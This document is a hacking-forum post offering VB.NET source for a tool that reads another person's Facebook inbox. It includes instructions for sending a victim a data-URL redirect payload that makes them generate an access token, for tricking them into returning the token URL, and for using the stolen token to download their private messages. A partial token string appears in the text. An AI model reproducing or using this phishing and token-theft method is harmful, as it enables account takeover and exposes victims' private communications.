Hey guys so im giving the source to my fb message reader...
its nothing big...
add a textbox, and a button named read
now enter the following code
Also here is the instructions to it
enjoy, dont forget to thx + rep
its nothing big...
add a textbox, and a button named read
now enter the following code
Code:
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("Enter Access Token")
Else
MsgBox("Enter .rtf extension in download. It should look like index.rtf. If .dll shows us then token is invalid")
WebBrowser1.Navigate("https://graph.facebook.com/me/inbox?access_token=" + TextBox1.Text)
End If
End Sub
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
End Sub
End ClassAlso here is the instructions to it
Code:
To get the access token, send this code to the victim and tell
him/her to enter it in the URL search in the web browser.
data:text/html,<html><meta http-equiv="refresh" content="0; url='http://goo.gl/ttFXGx'"></html>
Then find a creative way to get them to send back the link after
it loads. The link they will send back should look like
https://m.facebook.com/connect/login_success.html?=---___OFFICIAL_LIKER_TOKEN__------%3E#access_token=CAAAAPJmB8ZBwBADwtCJrF9v27DbekvIJJwmD8I2kvTjlV2KQ9dItzDahex6XNjj0ZBivJXrkNWusVS5SSQbXIQKWQFzZBgGEWUORleFWa79IYao8UmHgJOiSAd
but longer than this (I removed some of it for my sake).
Now copy the code after token= and Enter that in the textbox and
click download. It would look like
CAAAAPJmB8ZBwBADwtCJrF9v27DbekvIJJwmD8I2kvTjlV2KQ9dItzDahex6XNjj0ZBivJXrkNWusVS5SSQbXIQKWQFzZBgGEWUORleFWa79IYao8UmHgJOiSAd .
When downloading, make sure to set it as .rtf. So it would look
like index.rtf. If it downloads a dll file then the token is wrong.enjoy, dont forget to thx + rep























